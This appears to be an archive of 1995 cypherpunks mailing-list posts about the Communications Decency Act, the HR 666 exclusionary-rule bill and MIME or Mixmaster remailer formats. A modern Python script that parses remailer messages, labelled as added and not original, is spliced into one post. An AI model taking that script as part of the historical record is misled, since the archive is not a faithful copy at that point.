>    which is obscene, lewd, lascivious, filthy, or indecent;
> 
>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;
>    
>    (C) makes or causes the telephone of another repeatedly or   
>    continuously to ring, with intent to harass any person at the
>    called number; or
>    
>    (D) [makes repeated telephone calls, during which conversation
>    ensues, solely to harass any person at the called number; or]
>    makes repeated telephone calls or repeatedly initiates
>    communication with a telecommunications device, during which
>    conversation or communication ensues, solely to harass any
>    person at the called number or who receives the communication;
>    or

I.e., *just like with phones,* you can't send harassing or obscene 
messages to unwilling recipients.  Is there a lot of slack for 
bullshit?  You betcha!  A major change from the present?  Doesn't 
look like it.  [no intention of holding up the present as paradise, of 
course  ;-]

>    
>    
>    (b) Prohibited acts for commercial purposes; defense to prosecution
>    
>    (1) Whoever knowingly -
                         ^^^^^^^^^^ [applies to A & B below]
>    
>    (A) within the United States, by means of [telephone], 
>    telecommunications device makes (directly or by recording device)
>    any obscene communication for commercial purposes to any person, 
>    regardless of whether the maker of such communication [placed the
>    call] placed the call or initiated the conversation; or
>    
>    (B) permits any [telephone] telecommunications facility under such 
>    person's control to be used for an activity prohibited by
>    subparagraph (A), shall be fined in accordance with title 18 or 
>    imprisoned not more than two years, or both.
>    
>    (2) Whoever knowingly -
                         ^^^^^^^^^^ [applies to A & B below]
>    
>    (A) within the United States, [by means of telephone, makes]
>    by means of telecommunications device, makes, knowingly
>    transmits, or knowingly makes available (directly or by recording 
>    device) any indecent communication for commercial purposes which is 
>    available to any person under 18 years of age or to any other person 
>    without that person's consent, regardless of whether the maker of
>    such communication [placed the call] placed the call or
>    initiated the communication; or
>    
>    (B) permits any [telephone] telecommunications facility under such 
>    person's control to be used for an activity prohibited by subparagraph 
>    (A), shall be fined not more than [$50,000] $100,000 or imprisoned not 
>    more than [six months] 2 years, or both.
>

===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 20:44:47 PST
To: cypherpunks@toad.com
Subject: Re: Da Judge-L FAQ -- We are not Amused
Message-ID: <v03001423ab5f4cb21df1@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:56 2/8/95, Timothy C. May wrote:

>It has come to Our attention that Our FAQ, the Da Judge-L FAQ, is being
>distributed amongst the rabble...Defense will be heard, and then the
>guilty will be punished.

Thank you, Sir.  May I have another?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Wed, 8 Feb 95 17:44:38 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, root wrote:

> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegally if they 'believed'
> that it was collected in good faith.

This sounds like a spoof.  Look at the number.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 8 Feb 95 18:54:49 PST
To: tedwards@src.umd.edu
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <9502090254.AA11147@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> On Wed, 8 Feb 1995, Ben wrote:
> 
> > On Wed, 8 Feb 1995, root wrote:
> 
> > > A friend advises me that today House Bill 666 passed. This supposedly would
> > > allow police officers to use evidence collected illegally if they 'believed'
> > > that it was collected in good faith.
> 
> > This sounds like a spoof.  Look at the number.
> 
> Unfortunately, it is not.  World Wide Web yourself over to 
> http://thomas.loc.gov/ and search for hr 666...you will find it.
> 
> "A Bill to control crime by exclusionary rule reform..." maybe if 
> "control" means "aiding and abetting"
> 
> -Thomas
> 

I haven't looked it up yet, but I did hear about the bill on the news 
last night, so I would say it is legit. 

The number of the devil indeed.
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmueller@gac.edu
Date: Wed, 8 Feb 95 19:20:53 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Vernor Vinge info...
Message-ID: <199502090320.VAA04884@poblano.gac.edu>
MIME-Version: 1.0
Content-Type: text/plain


This may or may not have been already mentioned, but I've noticed that
Vernor Vinge will be the Guest of Honor at this year's Minicon Science
Fiction convention in Minneapolis, MN over easter weekend.  I'm planning
on going, and was just wondering if anyone here had anything in particular
they'd like me to ask him, should I get the chance to talk to him
(considering that I know quite well the chairman of last year's Minicon,
this is distinctly possible).  If anyone would like to attend, memberships
are $25 until February 14, then $55 after that and at the door.  Contact
me for further info if you're interested.

-- 
    Joel Mueller - "Here lies one whose name is writ in water."    -Keats
   		   Check my .plan for my PGP Public Key.  
 		    PGP encrypted mail is very welcome!
  This must be Thursday.  I never could get the hang of Thursdays.  -Dent



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 8 Feb 95 18:21:01 PST
To: rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v01510100ab5f0c4d5b89@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 2/8/95, strick@techwood.org wrote:
>Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
>thru 6am, but this changes regularly, usually as a result of "case law"
>(someone being prosecuted under next month's rules, not this month's)

Yup, this stuff is subject to change about every week--so much so that at
WFMU, our station manager simply imposed one set of fairly "conservative"
restrictions on "obscene" language at _all_ hours, set it down on paper,
and left it at that.  Can't blame him, as the guidelines were changing
literally every few months and at one point it was very easy to be
operating based on last month's rules.  "Safe harbor" loopholes,
disclaimers, etc., are history right now as far as I know, but of course it
may have changed.

I think the important thing is for the program director to have some
"responsible" codified policy to show to the FCC if they hassle you.  They
mainly want to know that s/he's keeping an eye on things and has some
coherent house rules.  This sucks, of course, but probably makes life
easier in the long run.  I have occasionally let a naughty word on a record
slip by (accidentally, of course), and no one's going to make a big deal
about it.

For a while, we were all convinced that the FCC left all these rules
impossibly vague on purpose, just so that you didn't even know how to obey
the law if you wanted to.  Everyone a potential criminal.

   --Dave.

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 8 Feb 95 18:21:35 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <Pine.SUN.3.91.950208211930.24981C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Ben wrote:

> On Wed, 8 Feb 1995, root wrote:

> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegally if they 'believed'
> > that it was collected in good faith.

> This sounds like a spoof.  Look at the number.

Unfortunately, it is not.  World Wide Web yourself over to 
http://thomas.loc.gov/ and search for hr 666...you will find it.

"A Bill to control crime by exclusionary rule reform..." maybe if 
"control" means "aiding and abetting"

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 8 Feb 95 18:29:57 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <199502090231.VAA04807@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


root writes:
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegally if they 'believed'
> that it was collected in good faith.

Ben writes:
# This sounds like a spoof.  Look at the number.

No, it's for real. This is the `Exclusionary Rule Reform Act of 1995', HR 666.
It was introduced Jan. 25 by a Rep. McCollum, referred to the Judiciary Cmte.,
and on Feb. 2 was "committed to the Committee of the Whole House on the State 
of the Union and ordered to be printed", whatever that means.

Here's an excerpt of the main idea: 

"Evidence [...] shall not be excluded [...] on the ground that the search or 
seizure was in violation of the fourth amendment [...] if the search or 
seizure was carried out in circumstances justifying an objectively reasonable 
belief that it was in conformity with the fourth amendment. The fact that 
evidence was obtained pursuant to and within the scope of a warrant 
constitutes prima facie evidence of the existence of such circumstances."

So I suppose this opens the possibility that, if a judge grants a search 
warrant that allows broader police powers than the 4th Amendment would, then 
the police have free rein to use those broader powers.

This is all via http://thomas.loc.gov/home/c104query.html.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 8 Feb 95 18:45:17 PST
To: "Craig A. Johnston" <cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Judges-L FAQ
Message-ID: <ab5f324500021004a86e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 02/08/95, Craig A. Johnston wrote:
>It has come to my attention that the Judges-L FAQ is being distributed
>by someone who obtained it on this list, and being sent to people made
>to look as if it has issued from David Stodolsky.
>
>I must inform you that this FAQ is copyrighted material, and
>you are requested not to distribute it.

Huh?  What kind of an FAQ is it, that can't be freely distributed?  If you
don't expect people to redistribute the text, don't call it an "FAQ".  The
phrase "FAQ list" is understood internet-wide (or at least usenet-wide) to
mean a freely distributable list of information someone might want on a
certain topic.  (It doesn't necessarily mean "Frequently Asked Questions",
literally, these days.  Cause there are often FAQs distributed that just
contain general information on a certain topic, but not actually questions
that have ever been asked before.  The Judges FAQ might be a good example.)


If you don't want people to redistribute the thing, they really should
change its name.  And write very explicitly at the top of the document
that no one should copy it without permission of the author.   These things
just aren't generally supposed to be true of FAQs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:50:54 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950208214510.14387A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, root wrote:

> Date: Wed, 8 Feb 1995 19:23:31 -0600 (CST)
> From: root <root@einstein.ssz.com>
> To: cypherpunks@toad.com
> Subject: Not necessarily crypto but scary anyway...
> 
> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegally if they 'believed'
> that it was collected in good faith.
> 
> Any word on it?
> 
> Thanks.
> 

As I understand the bill (though I didn't know it was up for passage...),
this is merely a restatement of the current judicial doctrine which 
prevents officers acting in good faith from being hindered by an 
illegally issued warrant.  In essence the concept is that the 4th 
amendment is intended to deter police misconduct by kicking out evidence 
gathered illegally.  Once a judge issues a warrant, and assuming it is 
issued illegally, but with no knowledge by the officers who execute the 
search, there is no longer any deterrent value in suppressing the evidence 
and as such it would be "counterproductive" to bar it from presentment.

This isn't really passage of "new" law, but legislative clarification of 
current judicial doctrine.  If there is enough interest, I would be happy 
to post cites to the key cases establishing the "good faith" exception to 
exclusion.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:53:14 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <Pine.SUN.3.91.950208215120.14387B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Ben wrote:

> Date: Wed, 8 Feb 1995 20:44:27 -0500 (EST)
> From: Ben <samman@CS.YALE.EDU>
> To: root <root@einstein.ssz.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Not necessarily crypto but scary anyway...
> 
> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegally if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

This would amuse me, as the spoofer would have, in trying to come up with 
an intimidating law that would result in public outrage, instead hit upon 
the current doctrine.

Truth stranger than fiction?

I do seem, however, to recall some mention of legislative clarification 
of the doctrine, so I suspect it to be legitimate.

> 
> Ben.
> 
> 

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:58:03 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090231.VAA04807@ducie.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950208215408.14387C-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, L. McCarthy wrote:

> Date: Wed, 8 Feb 1995 21:31:42 -0500 (EST)
> From: L. McCarthy <lmccarth@ducie.cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: Not necessarily crypto but scary anyway...
> 
> root writes:
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegally if they 'believed'
> > that it was collected in good faith.
> 
> Ben writes:
> # This sounds like a spoof.  Look at the number.
> 
> No, it's for real. This is the `Exclusionary Rule Reform Act of 1995', HR 666.
> It was introduced Jan. 25 by a Rep. McCollum, referred to the Judiciary Cmte.,
> and on Feb. 2 was "committed to the Committee of the Whole House on the State 
> of the Union and ordered to be printed", whatever that means.
> 
> Here's an excerpt of the main idea: 
> 
> "Evidence [...] shall not be excluded [...] on the ground that the search or 
> seizure was in violation of the fourth amendment [...] if the search or 
> seizure was carried out in circumstances justifying an objectively reasonable 
> belief that it was in conformity with the fourth amendment. The fact that 
> evidence was obtained pursuant to and within the scope of a warrant 
> constitutes prima facie evidence of the existence of such circumstances."
> 
> So I suppose this opens the possibility that, if a judge grants a search 
> warrant that allows broader police powers than the 4th Amendment would, then 
> the police have free rein to use those broader powers.

Precisely.
Again, if the judge issues the warrant, the damage is done, exclusion is 
pointless.  The concept that police should be expected to know the law is, 
apparently, silly.  I suppose you don't want police "second guessing" 
judges, but personally I wouldn't mind the implications.

The review process allows the warrant to be overturned and the evidence 
excluded if the issuing judge's basis for signing the warrant is "clearly 
erroneous"  (from memory.)  Where there is good faith involved by all the 
parties however....

> This is all via http://thomas.loc.gov/home/c104query.html.
> 
> -L. Futplex McCarthy
> 

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 8 Feb 95 19:14:24 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SOL.3.90.950208220830.11572B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it passed.  You can get a copy from thomas.loc.gov.

The Senate still has to pass it (but certainly will).
I think the Senate version is S3.

Brad Dolan


On Wed, 8 Feb 1995, root wrote:

> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegally if they 'believed'
> that it was collected in good faith.
> 
> Any word on it?
> 
> Thanks.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 20:10:17 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
Message-ID: <v0151011cab5f38526c94@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


>enlisting the ACLU, the EFF, and any other group potentially willing
>to pour money into a legal battle.


Fuck the EFF, they already lost their place in importance. The ACLU is a very good
place to start however. Ideas??

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Name Withheld)
Date: Wed, 8 Feb 95 22:28:07 PST
To: cypherpunks@toad.com
Subject: Coming to a newsserver near you alt.defeat.s314
Message-ID: <199502090627.WAA01928@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


Psychic Flash...This group will be up on auto-subscribing news servers
VERY soon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 22:35:58 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <PiQElKjqRmN1078yn@mirage.skypoint.com>
Message-ID: <199502090633.WAA08858@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:

> In article <Pine.3.89.9502081135.A7848-0100000@netcom10>, you wrote:
> > On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> > > I find it amazing that CPR and EFF
> > > haven't picked this up yet.
> >
> > Really?
> 
> I had at least hoped that they would have their ear to the ground.
> Unfortunately I was wrong. ;(

It's a tough thing for them to be involved enough to know what's going
on, but not so involved as to be a partner in the process.

We mostly all criticized them roundly for the Digital Telephony Bill
(I did too). They seem to have somewhat backed off from this approach,
or so it now appears to many of us. (Caveat:  before this is read by
EFF folks and indignantly denied, I make no claims of what the causal
chain was, what Berman's departure has to do with this, etc. Hence the
"they seem to have" phrasing.)

Anyway, how can we expect them to know about upcoming legislation if
we also despise the "inside the Beltway" mentality?

Frankly, I'd rather have them on our side, helping to fight bad
legislation, than working on the inside of things and thus face
compromise by the whole process.

As scary as S.314 is, I'm not sure it's likely to pass. Unlike the
Digital Telephony Bill, which was on greased skids, this  one seems to
have come out of left field. I could be wrong on this, and maybe it's
got a lot of sponsors, but it sounds like just another Bill that will
die in committee or fail on the floor.

(This is where the D.C.-net people, those who are connected to the
political process, can tell us who's likely to support it and who's
not.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Wed, 8 Feb 95 22:35:18 PST
To: Hal <cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <ab5f62d802021004dd65@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>Nathaniel Borenstein <nsb@nsb.fv.com> writes:
>
>>Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
>>"Perry E. Metzger"@imsi. (2553)
>
>>> > > It is being remailed via a MIME-based structure where two new content types
>>> > > are defined: multipart/remail and application/remail-commands.  The
>>> > > multipart/remail type is supposed to be composed of two parts, the
>>> > > application/remail-commands part which has remailer commands, and the
>>> > > other part which is the "payload" to be remailed.
>
>>Perhaps you might consider writing up an informational RFC to define
>>these types?  I think that would be very useful. -- Nathaniel
>
>Well, that was just an example; I was making those names up off the top
>of my head in order to concretize what I understood Perry was suggesting.
>
>I can see that putting remailer commands into a specific part of a MIME
>multipart message has some advantages.  Right now we are basically
>having the remailing commands be mail header fields.  But really people
>aren't supposed to just make up new fields like that.  I think the
>"name space" of these fields is protected somewhat more than many other
>aspects of communication protocols on the net.  Is there precedent for
>adding service-by-mail functionality in this way?  I am not completely
>comfortable with it.  And as we think of new functionality and new
>commands they all have to get added at this top level, the same
>visibility and name space as "Subject", "From", and "To".
>
>OTOH it does have the advantage that it is easy to do, at least with the
>"::" pasting token idea (which perhaps would need to be documented in its
>own right).
>
>If we did use a separate message part we'd have our own little name space
>to use, with no fears of conflicting with someone else.  (Maybe "Latency"
>might be used in a future extension of RFC822 for some other meaning than
>what we are using it for.)  I am not sure what has to be done to get an
>RFC approved but I suspect that adding mail header fields would be much
>more likely to hit opposition than adding yet another MIME type.
>
>What does Mixmaster use for its commands?  Does it use "::" followed by
>Anon-Send-To: and such?  Or some other format?  Maybe it should be made
>MIME compliant from the beginning.  This way we are moving with the
>current, the flow of the net, rather than across it.
>
>Hal

With Mixmaster, everything is hidden inside the encrypted and ascii armored
message structure.

I use the :: token to let the remailer know that this is a remailer message
of some sort. The Remailer-Type will eventually be used to indicate the
version that created the message. It would be easy to add support for MIME.
It would just replace the token and version number.

All remailing instructions are inside the ascii armor.
Note that the block of ascii armor is always exactly the same length.

::
Remailer-Type: 2.0

-----BEGIN REMAILER MESSAGE-----
hQCMAgbmF1BLzawNAQP/RFw2/UagugMFPlnJ94KLmhaxDoplzAhNBCxuFRL2fosL
V1YnFd2XVckJJ6vTe6DB+POO+V7HEdXkp3sWtjb56Am+/B+tM1TdeC6NPNV4g5PC
15oYl7eD0ZxyjB34GdN5z/C2mOMbvP3k9eK3pn3ffkaXHBt1Y0I9ZieHkE6erxem
AAAAusuiqVunPh15+7gttD5pNuIAOFDKfH8NJ39ReSEFAeeiOun6KSneJT+2DJ9Q
LbK14WqsBVu1kDaUOHKchE9hPSFfTijTJp7I+GuiuOkDChUzZNZ21xpBS+8xMg58
0i61z9EEf11G0G5JShTaeaGWNd14QxoyrxjTh9PrItOz49M9lSY71KoTP2+fVc0h
xDGHw7iVeeToOtFqmDBI14FOVJz2rYuMu7vTD+MTwP3INkraCXqTeBoJ7g31Nhqj
<SNIP>
LbK14WqsBVu1kDaUOHKchE9hPSFfTijTJp7I+GuiuOkDChUzZNZ21xpBS+8xMg58
0i61z9EEf11G0G5JShTaeaGWNd14QxoyrxjTh9PrItOz49M9lSY71KoTP2+fVc0h
xDGHw7iVeeToOtFqmDBI14FOVJz2rYuMu7vTD+MTwP3INkraCXqTeBoJ7g31Nhqj
VYbH5jxvKPjF4HEaS++MaBwTvzBkEKxbS+6oh7G/ndkHBxA7d7C0sx+qX9sjJyAs
OIpGERZYA9RVspXUWys5fihnwrhk90dDAVZb8hTsPQfTXLp4
=ouPq
-----END REMAILER MESSAGE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
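The layout described in the message above (the "::" token, a Remailer-Type header, then an armored block that is always the same length), as an added Python example that is not part of the original post and is not Mixmaster's own code. The function names, the 1024-byte sample payload size and the "=AAAA" checksum placeholder are assumptions made for the demonstration; the trailing "=xxxx" line is treated as opaque and not verified.

```python
import base64
import binascii
import hashlib
from collections import Counter

BEGIN = "-----BEGIN REMAILER MESSAGE-----"
END = "-----END REMAILER MESSAGE-----"
SAMPLE_PAYLOAD_LEN = 1024  # constructed value for this demo, not Mixmaster's real size


class RemailerFormatError(ValueError):
    """Raised when a body does not follow the '::' / header / armor layout."""


def parse_remailer_message(body):
    """Return the Remailer-Type, decoded payload and opaque checksum of one body."""
    lines = [ln.rstrip() for ln in body.splitlines()]
    i = 0
    while i < len(lines) and not lines[i]:      # tolerate leading blank lines
        i += 1
    if i == len(lines) or lines[i] != "::":
        raise RemailerFormatError("body does not start with the '::' token")
    i += 1
    headers = {}
    while i < len(lines) and lines[i]:          # pasted headers end at a blank line
        name, sep, value = lines[i].partition(":")
        if not sep or not name.strip():
            raise RemailerFormatError("malformed header line: %r" % lines[i])
        headers[name.strip().lower()] = value.strip()
        i += 1
    if "remailer-type" not in headers:
        raise RemailerFormatError("no Remailer-Type header after '::'")
    try:
        start = lines.index(BEGIN, i)
        stop = lines.index(END, start + 1)
    except ValueError:
        raise RemailerFormatError("armor delimiters missing or out of order") from None
    armor = [ln for ln in lines[start + 1:stop] if ln]
    checksum = None
    # A base64 line never starts with '=', so a 5-character '=xxxx' line is the checksum.
    if armor and armor[-1].startswith("=") and len(armor[-1]) == 5:
        checksum = armor.pop()[1:]
    try:
        payload = base64.b64decode("".join(armor), validate=True)
    except binascii.Error as exc:
        raise RemailerFormatError("armor is not valid base64: %s" % exc) from None
    return {"type": headers["remailer-type"], "payload": payload, "checksum": checksum}


def size_outliers(bodies):
    """Indexes of messages whose decoded payload length differs from the majority.

    A message that is not the common length stands out to anyone watching the
    traffic, which is what the fixed-length armor is meant to prevent.
    """
    lengths = [len(parse_remailer_message(b)["payload"]) for b in bodies]
    if not lengths:
        return []
    expected = Counter(lengths).most_common(1)[0][0]
    return [i for i, n in enumerate(lengths) if n != expected]


def build_sample(seed, length=SAMPLE_PAYLOAD_LEN, rtype="2.0"):
    """Build a constructed message in the same layout (stand-in bytes, not ciphertext)."""
    stream = b""
    counter = 0
    while len(stream) < length:
        stream += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    b64 = base64.b64encode(stream[:length]).decode("ascii")
    armor = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    # "=AAAA" is a placeholder checksum line, not a computed value.
    return "::\nRemailer-Type: %s\n\n%s\n%s\n=AAAA\n%s\n" % (rtype, BEGIN, armor, END)


if __name__ == "__main__":
    # Constructed inputs: two uniform messages and one that is shorter.
    batch = [build_sample(b"a"), build_sample(b"b"), build_sample(b"c", length=700)]
    first = parse_remailer_message(batch[0])
    print("type:", first["type"], "payload bytes:", len(first["payload"]))
    print("messages that break the fixed length:", size_outliers(batch))
```
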






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 8 Feb 95 19:40:30 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <ab5f3ee0020210049ec6@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 PM 02/08/95, Black Unicorn wrote:
>As I understand the bill, (Though I didn't know it was up for passage...)
> this is merely a restatement of the current judicial doctrine which
>prevents officers acting in good faith from being hindered by an
>illegally issued warrant.  In essence the concept is that the 4th
>amendment is intended to deter police misconduct by kicking out evidence
>gathered illegally.  Once a judge issues a warrant, and assuming it is
>issued illegally, but with no knowledge by the officers who execute the
>search, there is no longer any deterrent value in suppressing the evidence
>and as such it would be "counterproductive" to bar it from presentment.

Right, just what we want to do. Encourage police officers to remain as
ignorant as humanly possible about constitutional law and citizens' rights.
If the police officers can manage to remain so ignorant of con law that
they have absolutely no idea that sometimes they aren't supposed to search
citizens' property, apparently all the evidence they acquire will be
admissible in court.

Well, I feel safer knowing that we encourage a police force that won't let
a little knowledge of the bill of rights interfere with their ability to
apprehend drug dealers, terrorists, and pedophiles.

But if it's already current practice, it's already current practice.  Of
course, it would be nice if our legislators took time to write law which
_increased_ our rights, or which more strictly defined rights that previous
legislation and constitution as interpreted by the courts defined loosely.
Instead, we seem to expect congress to constantly try to get laws by the
supreme court that are completely totalitarian, and feel lucky when they
merely reinforce preexisting undesirable court decisions. sigh.  Jefferson
_and_ Hamilton are both spinning in their graves.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Wed, 8 Feb 95 09:39:16 PST
To: cypherpunks@toad.com
Subject: Re:  Selection key crypto protocol trial balloon
In-Reply-To: <9502070328.AA13539@anchor.ho.att.com>
Message-ID: <J84c2c4w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com writes:

> I'm not sure I really believe it's workable, but what it does
